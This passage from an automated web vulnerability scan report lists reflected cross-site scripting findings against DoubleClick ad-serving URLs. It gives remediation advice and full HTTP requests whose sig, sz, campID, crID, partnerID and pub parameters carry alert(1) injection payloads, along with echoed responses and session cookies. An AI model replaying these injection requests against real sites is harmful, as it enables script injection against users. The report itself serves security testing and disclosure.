Path:   /adi/N3941.InviteMedia/B5414127.34

Issue detail

The value of the sig request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6622f"-alert(1)-"031dd620da0 was submitted in the sig parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N3941.InviteMedia/B5414127.34;sz=160x600;pc=[TPAS_ID];click=http://adclick.g.doubleclick.net/aclk?sa=l&ai=BPFIjuKPKTcG9EIjilQfLg-X4A63mhMIBhcPSjheF7dq3UwAQARgBIAA4AVCAx-HEBGDJhoWJiKSEEIIBF2NhLXB1Yi05Njc0OTQyMDA5MzQ1ODA3oAGrl7rtA7IBEXd3dy5zdGFycHVsc2UuY29tugEKMTYweDYwMF9hc8gBCdoBWWh0dHA6Ly93d3cuc3RhcnB1bHNlLmNvbS9uZXdzL2luZGV4LnBocC8yMDExLzA1LzEwL2xhZHlfZ2FnYV90b19sYXVuY2hfY2FubmVzX2ZpbG1fZmVzdGl2mAL0K8ACBcgClbKwC-ACAOoCCE5ld3MtU2t5qAMB6AO4AegDA-gDswHoA5gr6AO-CPUDAAAAxOAEAYAG1fmCq7ylpvqMAQ&num=1&sig=AGiWqtzzy-S6jLLXXb6Pq5hpabkbEO9dOw6622f"-alert(1)-"031dd620da0&client=ca-pub-9674942009345807&adurl=http%3A%2F%2Fva.px.invitemedia.com%2Fpixel%3FreturnType%3Dredirect%26key%3DClick%26message%3DeJyrVjI2VrJSMDI1NDLTUVAyNgJyTC2BHEsgzxDIUQpJLswqdXR09Sh29TaNcPUMqMhxqiy3tVUCKQcpKM3LzssvzwPxQbpNgLQpkLYwMAMxTYDMvNKcHCDTDMg0M7KwtKwFAGYRG7w-%26redirectURL%3D;ord=TcqjuAAEHsEK5XEIPxlByw==? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 11 May 2011 15:05:12 GMT
Content-Length: 9245

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
ExLzA1LzEwL2xhZHlfZ2FnYV90b19sYXVuY2hfY2FubmVzX2ZpbG1fZmVzdGl2mAL0K8ACBcgClbKwC-ACAOoCCE5ld3MtU2t5qAMB6AO4AegDA-gDswHoA5gr6AO-CPUDAAAAxOAEAYAG1fmCq7ylpvqMAQ&num=1&sig=AGiWqtzzy-S6jLLXXb6Pq5hpabkbEO9dOw6622f"-alert(1)-"031dd620da0&client=ca-pub-9674942009345807&adurl=http%3A%2F%2Fva.px.invitemedia.com%2Fpixel%3FreturnType%3Dredirect%26key%3DClick%26message%3DeJyrVjI2VrJSMDI1NDLTUVAyNgJyTC2BHEsgzxDIUQpJLswqdXR09Sh29TaNcPUMqMhxqi
...[SNIP]...

5.45. http://ad.doubleclick.net/adi/N3941.InviteMedia/B5414127.34 [sz parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N3941.InviteMedia/B5414127.34

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f3c64"-alert(1)-"664178a7c45 was submitted in the sz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N3941.InviteMedia/B5414127.34;sz=160x600;pc=[TPAS_ID];click=http://adclick.g.doubleclick.net/aclk?sa=lf3c64"-alert(1)-"664178a7c45&ai=BPFIjuKPKTcG9EIjilQfLg-X4A63mhMIBhcPSjheF7dq3UwAQARgBIAA4AVCAx-HEBGDJhoWJiKSEEIIBF2NhLXB1Yi05Njc0OTQyMDA5MzQ1ODA3oAGrl7rtA7IBEXd3dy5zdGFycHVsc2UuY29tugEKMTYweDYwMF9hc8gBCdoBWWh0dHA6Ly93d3cuc3RhcnB1bHNlLmNvbS9uZXdzL2luZGV4LnBocC8yMDExLzA1LzEwL2xhZHlfZ2FnYV90b19sYXVuY2hfY2FubmVzX2ZpbG1fZmVzdGl2mAL0K8ACBcgClbKwC-ACAOoCCE5ld3MtU2t5qAMB6AO4AegDA-gDswHoA5gr6AO-CPUDAAAAxOAEAYAG1fmCq7ylpvqMAQ&num=1&sig=AGiWqtzzy-S6jLLXXb6Pq5hpabkbEO9dOw&client=ca-pub-9674942009345807&adurl=http%3A%2F%2Fva.px.invitemedia.com%2Fpixel%3FreturnType%3Dredirect%26key%3DClick%26message%3DeJyrVjI2VrJSMDI1NDLTUVAyNgJyTC2BHEsgzxDIUQpJLswqdXR09Sh29TaNcPUMqMhxqiy3tVUCKQcpKM3LzssvzwPxQbpNgLQpkLYwMAMxTYDMvNKcHCDTDMg0M7KwtKwFAGYRG7w-%26redirectURL%3D;ord=TcqjuAAEHsEK5XEIPxlByw==? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 11 May 2011 15:03:20 GMT
Content-Length: 9245

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
et/click%3Bh%3Dv8/3b04/f/31a/%2a/d%3B239944485%3B0-0%3B0%3B62578502%3B2321-160/600%3B41633482/41651269/1%3B%3B%7Eokv%3D%3Bpc%3D%5BTPAS_ID%5D%3B%3B%7Esscs%3D%3fhttp://adclick.g.doubleclick.net/aclk?sa=lf3c64"-alert(1)-"664178a7c45&ai=BPFIjuKPKTcG9EIjilQfLg-X4A63mhMIBhcPSjheF7dq3UwAQARgBIAA4AVCAx-HEBGDJhoWJiKSEEIIBF2NhLXB1Yi05Njc0OTQyMDA5MzQ1ODA3oAGrl7rtA7IBEXd3dy5zdGFycHVsc2UuY29tugEKMTYweDYwMF9hc8gBCdoBWWh0dHA6Ly93d3cuc3RhcnB1
...[SNIP]...

5.46. http://ad.doubleclick.net/adi/N3941.InviteMedia/B5414127.861 [campID parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N3941.InviteMedia/B5414127.861

Issue detail

The value of the campID request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 84c68"-alert(1)-"169a8ab34c5 was submitted in the campID parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N3941.InviteMedia/B5414127.861;sz=300x250;pc=[TPAS_ID];click=http://ad.burstdirectads.com/clk?2,13%3B54d78a545d4921a5%3B12fdf91f16a,0%3B%3B%3B1644949686,T61cAKFaHACU-Y0AAAAAAN8.IwAAAAAAAgAEAAIAAAAAAP8AAAAECn4bKAAAAAAAPrsfAAAAAABhNC4AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABSoxAAAAAAAAIAAwAAAAAAavGR3y8BAAAAAAAAADQ2ZDJiZGEwLTdiZGYtMTFlMC04NDMyLTI3YmU4ZjQwMDY3ZADWlQEAAAA=,http%3A%2F%2Fwww.burstnet.com%2Fads%2Fad21832a-map.cgi%2FBCPG175222.253833.315920%2FVTS%3D2jBZy.S7nc%2FSZ%3D300X250A%2FV%3D2.3S%2F%2FST%3D0Qxi0i9J10y61Gbc47hgYD2_3S02vc02vc%2FREDIRURL%3D,http%3A%2F%2Fnews.lalate.com%2F2011%2F05%2F11%2Fshingles-not-pink-eye-tony-la-russa-health-condition-revealed%2F,$http://t.invitemedia.com/track_click?auctionID=13051259741858209-115261&campID=8034084c68"-alert(1)-"169a8ab34c5&crID=115261&pubICode=2079550&pub=389015&partnerID=9&url=http%3A%2F%2Fnews%2Elalate%2Ecom%2F2011%2F05%2F11%2Fshingles%2Dnot%2Dpink%2Deye%2Dtony%2Dla%2Drussa%2Dhealth%2Dcondition%2Drevealed%2F&redirectURL=;ord=1305125974? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/iframe3?T61cAKFaHACU-Y0AAAAAAN8.IwAAAAAAAgAEAAIAAAAAAP8AAAAECn4bKAAAAAAAPrsfAAAAAABhNC4AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABSoxAAAAAAAAIAAwAAAAAAKVyPwvUoFEAAAAAAAAAoQClcj8L1KBRAAAAAAAAAKEApXI.C9SgUQAAAAAAAAChAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACLJddA04gTCkxhZkKZSoLA9M5ynJbHwwXK9nkLAAAAAA==,http%3A%2F%2Fwww.burstnet.com%2Fads%2Fad21832a-map.cgi%2FBCPG175222.253833.315920%2FVTS%3D2jBZy.S7nc%2FSZ%3D300X250A%2FV%3D2.3S%2F%2FST%3D0Qxi0i9J10y61Gbc47hgYD2_3S02vc02vc%2FREDIRURL%3D,http%3A%2F%2Fnews.lalate.com%2F2011%2F05%2F11%2Fshingles-not-pink-eye-tony-la-russa-health-condition-revealed%2F,Z%3D300x250%26bur%3D50493%26s%3D1858209%26x%3Dhttp%253a%252f%252fwww.burstnet.com%252fads%252fad21832a%252dmap.cgi%252fBCPG175222.253833.315920%252fVTS%253d2jBZy.S7nc%252fSZ%253d300X250A%252fV%253d2.3S%252f%252fST%253d0Qxi0i9J10y61Gbc47hgYD2%255f3S02vc02vc%252fREDIRURL%253d%26_salt%3D1701219495%26B%3D10%26u%3Dhttp%253A%252F%252Fnews.lalate.com%252F2011%252F05%252F11%252Fshingles-not-pink-eye-tony-la-russa-health-condition-revealed%252F%26r%3D0,46d2bda0-7bdf-11e0-8432-27be8f40067d
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 11 May 2011 15:27:14 GMT
Content-Length: 10042

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
3D,http%3A%2F%2Fnews.lalate.com%2F2011%2F05%2F11%2Fshingles-not-pink-eye-tony-la-russa-health-condition-revealed%2F,$http://t.invitemedia.com/track_click?auctionID=13051259741858209-115261&campID=8034084c68"-alert(1)-"169a8ab34c5&crID=115261&pubICode=2079550&pub=389015&partnerID=9&url=http%3A%2F%2Fnews%2Elalate%2Ecom%2F2011%2F05%2F11%2Fshingles%2Dnot%2Dpink%2Deye%2Dtony%2Dla%2Drussa%2Dhealth%2Dcondition%2Drevealed%2F&redirectU
...[SNIP]...

5.47. http://ad.doubleclick.net/adi/N3941.InviteMedia/B5414127.861 [crID parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N3941.InviteMedia/B5414127.861

Issue detail

The value of the crID request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 526cf"-alert(1)-"81137346fbf was submitted in the crID parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N3941.InviteMedia/B5414127.861;sz=300x250;pc=[TPAS_ID];click=http://ad.burstdirectads.com/clk?2,13%3B54d78a545d4921a5%3B12fdf91f16a,0%3B%3B%3B1644949686,T61cAKFaHACU-Y0AAAAAAN8.IwAAAAAAAgAEAAIAAAAAAP8AAAAECn4bKAAAAAAAPrsfAAAAAABhNC4AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABSoxAAAAAAAAIAAwAAAAAAavGR3y8BAAAAAAAAADQ2ZDJiZGEwLTdiZGYtMTFlMC04NDMyLTI3YmU4ZjQwMDY3ZADWlQEAAAA=,http%3A%2F%2Fwww.burstnet.com%2Fads%2Fad21832a-map.cgi%2FBCPG175222.253833.315920%2FVTS%3D2jBZy.S7nc%2FSZ%3D300X250A%2FV%3D2.3S%2F%2FST%3D0Qxi0i9J10y61Gbc47hgYD2_3S02vc02vc%2FREDIRURL%3D,http%3A%2F%2Fnews.lalate.com%2F2011%2F05%2F11%2Fshingles-not-pink-eye-tony-la-russa-health-condition-revealed%2F,$http://t.invitemedia.com/track_click?auctionID=13051259741858209-115261&campID=80340&crID=115261526cf"-alert(1)-"81137346fbf&pubICode=2079550&pub=389015&partnerID=9&url=http%3A%2F%2Fnews%2Elalate%2Ecom%2F2011%2F05%2F11%2Fshingles%2Dnot%2Dpink%2Deye%2Dtony%2Dla%2Drussa%2Dhealth%2Dcondition%2Drevealed%2F&redirectURL=;ord=1305125974? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/iframe3?T61cAKFaHACU-Y0AAAAAAN8.IwAAAAAAAgAEAAIAAAAAAP8AAAAECn4bKAAAAAAAPrsfAAAAAABhNC4AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABSoxAAAAAAAAIAAwAAAAAAKVyPwvUoFEAAAAAAAAAoQClcj8L1KBRAAAAAAAAAKEApXI.C9SgUQAAAAAAAAChAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACLJddA04gTCkxhZkKZSoLA9M5ynJbHwwXK9nkLAAAAAA==,http%3A%2F%2Fwww.burstnet.com%2Fads%2Fad21832a-map.cgi%2FBCPG175222.253833.315920%2FVTS%3D2jBZy.S7nc%2FSZ%3D300X250A%2FV%3D2.3S%2F%2FST%3D0Qxi0i9J10y61Gbc47hgYD2_3S02vc02vc%2FREDIRURL%3D,http%3A%2F%2Fnews.lalate.com%2F2011%2F05%2F11%2Fshingles-not-pink-eye-tony-la-russa-health-condition-revealed%2F,Z%3D300x250%26bur%3D50493%26s%3D1858209%26x%3Dhttp%253a%252f%252fwww.burstnet.com%252fads%252fad21832a%252dmap.cgi%252fBCPG175222.253833.315920%252fVTS%253d2jBZy.S7nc%252fSZ%253d300X250A%252fV%253d2.3S%252f%252fST%253d0Qxi0i9J10y61Gbc47hgYD2%255f3S02vc02vc%252fREDIRURL%253d%26_salt%3D1701219495%26B%3D10%26u%3Dhttp%253A%252F%252Fnews.lalate.com%252F2011%252F05%252F11%252Fshingles-not-pink-eye-tony-la-russa-health-condition-revealed%252F%26r%3D0,46d2bda0-7bdf-11e0-8432-27be8f40067d
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 11 May 2011 15:27:55 GMT
Content-Length: 9952

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
F%2Fnews.lalate.com%2F2011%2F05%2F11%2Fshingles-not-pink-eye-tony-la-russa-health-condition-revealed%2F,$http://t.invitemedia.com/track_click?auctionID=13051259741858209-115261&campID=80340&crID=115261526cf"-alert(1)-"81137346fbf&pubICode=2079550&pub=389015&partnerID=9&url=http%3A%2F%2Fnews%2Elalate%2Ecom%2F2011%2F05%2F11%2Fshingles%2Dnot%2Dpink%2Deye%2Dtony%2Dla%2Drussa%2Dhealth%2Dcondition%2Drevealed%2F&redirectURL=http%3a%2
...[SNIP]...

5.48. http://ad.doubleclick.net/adi/N3941.InviteMedia/B5414127.861 [partnerID parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N3941.InviteMedia/B5414127.861

Issue detail

The value of the partnerID request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3c8ef"-alert(1)-"b4f927ee1c1 was submitted in the partnerID parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. Where a value must be placed inside a JavaScript string literal, encode it for that exact context (for example, emit it as a JSON string literal and additionally escape <, > and the U+2028/U+2029 line terminators as \uXXXX sequences) so that a " in the input cannot terminate the literal and a </script> sequence cannot terminate the enclosing script element. HTML entity encoding is not a substitute: entities are not decoded inside a script element, so it would corrupt the value without producing a correct literal.

Request

GET /adi/N3941.InviteMedia/B5414127.861;sz=300x250;pc=[TPAS_ID];click=http://ad.burstdirectads.com/clk?2,13%3B54d78a545d4921a5%3B12fdf91f16a,0%3B%3B%3B1644949686,T61cAKFaHACU-Y0AAAAAAN8.IwAAAAAAAgAEAAIAAAAAAP8AAAAECn4bKAAAAAAAPrsfAAAAAABhNC4AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABSoxAAAAAAAAIAAwAAAAAAavGR3y8BAAAAAAAAADQ2ZDJiZGEwLTdiZGYtMTFlMC04NDMyLTI3YmU4ZjQwMDY3ZADWlQEAAAA=,http%3A%2F%2Fwww.burstnet.com%2Fads%2Fad21832a-map.cgi%2FBCPG175222.253833.315920%2FVTS%3D2jBZy.S7nc%2FSZ%3D300X250A%2FV%3D2.3S%2F%2FST%3D0Qxi0i9J10y61Gbc47hgYD2_3S02vc02vc%2FREDIRURL%3D,http%3A%2F%2Fnews.lalate.com%2F2011%2F05%2F11%2Fshingles-not-pink-eye-tony-la-russa-health-condition-revealed%2F,$http://t.invitemedia.com/track_click?auctionID=13051259741858209-115261&campID=80340&crID=115261&pubICode=2079550&pub=389015&partnerID=93c8ef"-alert(1)-"b4f927ee1c1&url=http%3A%2F%2Fnews%2Elalate%2Ecom%2F2011%2F05%2F11%2Fshingles%2Dnot%2Dpink%2Deye%2Dtony%2Dla%2Drussa%2Dhealth%2Dcondition%2Drevealed%2F&redirectURL=;ord=1305125974? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/iframe3?T61cAKFaHACU-Y0AAAAAAN8.IwAAAAAAAgAEAAIAAAAAAP8AAAAECn4bKAAAAAAAPrsfAAAAAABhNC4AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABSoxAAAAAAAAIAAwAAAAAAKVyPwvUoFEAAAAAAAAAoQClcj8L1KBRAAAAAAAAAKEApXI.C9SgUQAAAAAAAAChAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACLJddA04gTCkxhZkKZSoLA9M5ynJbHwwXK9nkLAAAAAA==,http%3A%2F%2Fwww.burstnet.com%2Fads%2Fad21832a-map.cgi%2FBCPG175222.253833.315920%2FVTS%3D2jBZy.S7nc%2FSZ%3D300X250A%2FV%3D2.3S%2F%2FST%3D0Qxi0i9J10y61Gbc47hgYD2_3S02vc02vc%2FREDIRURL%3D,http%3A%2F%2Fnews.lalate.com%2F2011%2F05%2F11%2Fshingles-not-pink-eye-tony-la-russa-health-condition-revealed%2F,Z%3D300x250%26bur%3D50493%26s%3D1858209%26x%3Dhttp%253a%252f%252fwww.burstnet.com%252fads%252fad21832a%252dmap.cgi%252fBCPG175222.253833.315920%252fVTS%253d2jBZy.S7nc%252fSZ%253d300X250A%252fV%253d2.3S%252f%252fST%253d0Qxi0i9J10y61Gbc47hgYD2%255f3S02vc02vc%252fREDIRURL%253d%26_salt%3D1701219495%26B%3D10%26u%3Dhttp%253A%252F%252Fnews.lalate.com%252F2011%252F05%252F11%252Fshingles-not-pink-eye-tony-la-russa-health-condition-revealed%252F%26r%3D0,46d2bda0-7bdf-11e0-8432-27be8f40067d
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 11 May 2011 15:30:18 GMT
Content-Length: 9952

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
hingles-not-pink-eye-tony-la-russa-health-condition-revealed%2F,$http://t.invitemedia.com/track_click?auctionID=13051259741858209-115261&campID=80340&crID=115261&pubICode=2079550&pub=389015&partnerID=93c8ef"-alert(1)-"b4f927ee1c1&url=http%3A%2F%2Fnews%2Elalate%2Ecom%2F2011%2F05%2F11%2Fshingles%2Dnot%2Dpink%2Deye%2Dtony%2Dla%2Drussa%2Dhealth%2Dcondition%2Drevealed%2F&redirectURL=http%3a%2f%2fwww.tdameritrade.com/tradearchitect.
...[SNIP]...

5.49. http://ad.doubleclick.net/adi/N3941.InviteMedia/B5414127.861 [pub parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N3941.InviteMedia/B5414127.861

Issue detail

The value of the pub request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c4923"-alert(1)-"ebec3c9a8ba was submitted in the pub parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. Where a value must be placed inside a JavaScript string literal, encode it for that exact context (for example, emit it as a JSON string literal and additionally escape <, > and the U+2028/U+2029 line terminators as \uXXXX sequences) so that a " in the input cannot terminate the literal and a </script> sequence cannot terminate the enclosing script element. HTML entity encoding is not a substitute: entities are not decoded inside a script element, so it would corrupt the value without producing a correct literal.

Request

GET /adi/N3941.InviteMedia/B5414127.861;sz=300x250;pc=[TPAS_ID];click=http://ad.burstdirectads.com/clk?2,13%3B54d78a545d4921a5%3B12fdf91f16a,0%3B%3B%3B1644949686,T61cAKFaHACU-Y0AAAAAAN8.IwAAAAAAAgAEAAIAAAAAAP8AAAAECn4bKAAAAAAAPrsfAAAAAABhNC4AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABSoxAAAAAAAAIAAwAAAAAAavGR3y8BAAAAAAAAADQ2ZDJiZGEwLTdiZGYtMTFlMC04NDMyLTI3YmU4ZjQwMDY3ZADWlQEAAAA=,http%3A%2F%2Fwww.burstnet.com%2Fads%2Fad21832a-map.cgi%2FBCPG175222.253833.315920%2FVTS%3D2jBZy.S7nc%2FSZ%3D300X250A%2FV%3D2.3S%2F%2FST%3D0Qxi0i9J10y61Gbc47hgYD2_3S02vc02vc%2FREDIRURL%3D,http%3A%2F%2Fnews.lalate.com%2F2011%2F05%2F11%2Fshingles-not-pink-eye-tony-la-russa-health-condition-revealed%2F,$http://t.invitemedia.com/track_click?auctionID=13051259741858209-115261&campID=80340&crID=115261&pubICode=2079550&pub=389015c4923"-alert(1)-"ebec3c9a8ba&partnerID=9&url=http%3A%2F%2Fnews%2Elalate%2Ecom%2F2011%2F05%2F11%2Fshingles%2Dnot%2Dpink%2Deye%2Dtony%2Dla%2Drussa%2Dhealth%2Dcondition%2Drevealed%2F&redirectURL=;ord=1305125974? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/iframe3?T61cAKFaHACU-Y0AAAAAAN8.IwAAAAAAAgAEAAIAAAAAAP8AAAAECn4bKAAAAAAAPrsfAAAAAABhNC4AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABSoxAAAAAAAAIAAwAAAAAAKVyPwvUoFEAAAAAAAAAoQClcj8L1KBRAAAAAAAAAKEApXI.C9SgUQAAAAAAAAChAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACLJddA04gTCkxhZkKZSoLA9M5ynJbHwwXK9nkLAAAAAA==,http%3A%2F%2Fwww.burstnet.com%2Fads%2Fad21832a-map.cgi%2FBCPG175222.253833.315920%2FVTS%3D2jBZy.S7nc%2FSZ%3D300X250A%2FV%3D2.3S%2F%2FST%3D0Qxi0i9J10y61Gbc47hgYD2_3S02vc02vc%2FREDIRURL%3D,http%3A%2F%2Fnews.lalate.com%2F2011%2F05%2F11%2Fshingles-not-pink-eye-tony-la-russa-health-condition-revealed%2F,Z%3D300x250%26bur%3D50493%26s%3D1858209%26x%3Dhttp%253a%252f%252fwww.burstnet.com%252fads%252fad21832a%252dmap.cgi%252fBCPG175222.253833.315920%252fVTS%253d2jBZy.S7nc%252fSZ%253d300X250A%252fV%253d2.3S%252f%252fST%253d0Qxi0i9J10y61Gbc47hgYD2%255f3S02vc02vc%252fREDIRURL%253d%26_salt%3D1701219495%26B%3D10%26u%3Dhttp%253A%252F%252Fnews.lalate.com%252F2011%252F05%252F11%252Fshingles-not-pink-eye-tony-la-russa-health-condition-revealed%252F%26r%3D0,46d2bda0-7bdf-11e0-8432-27be8f40067d
